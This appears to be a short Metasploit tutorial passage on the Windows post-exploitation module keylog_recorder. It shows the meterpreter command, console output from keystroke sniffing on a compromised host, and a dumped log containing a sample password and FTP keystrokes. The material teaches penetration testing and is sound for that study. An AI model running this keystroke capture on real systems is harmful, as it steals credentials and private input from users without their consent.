Windows Post Capture Modules


The “keylog_recorder” post module captures keystrokes on the compromised system. Note that you will want to ensure that you have migrated to an interactive process prior to capturing keystrokes.

meterpreter > run post/windows/capture/keylog_recorder 

[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Interrupt 
[*] Stopping keystroke sniffer...
meterpreter >

After we have finished sniffing keystrokes, or even while the sniffer is still running, we can dump the captured data.

root@kali:~# cat /root/.msf4/loot/
Keystroke log started at Thu Apr 21 12:03:55 -0600 2011
root  s3cr3t
ftp ftp.micro  anonymous  anon@ano  e  quit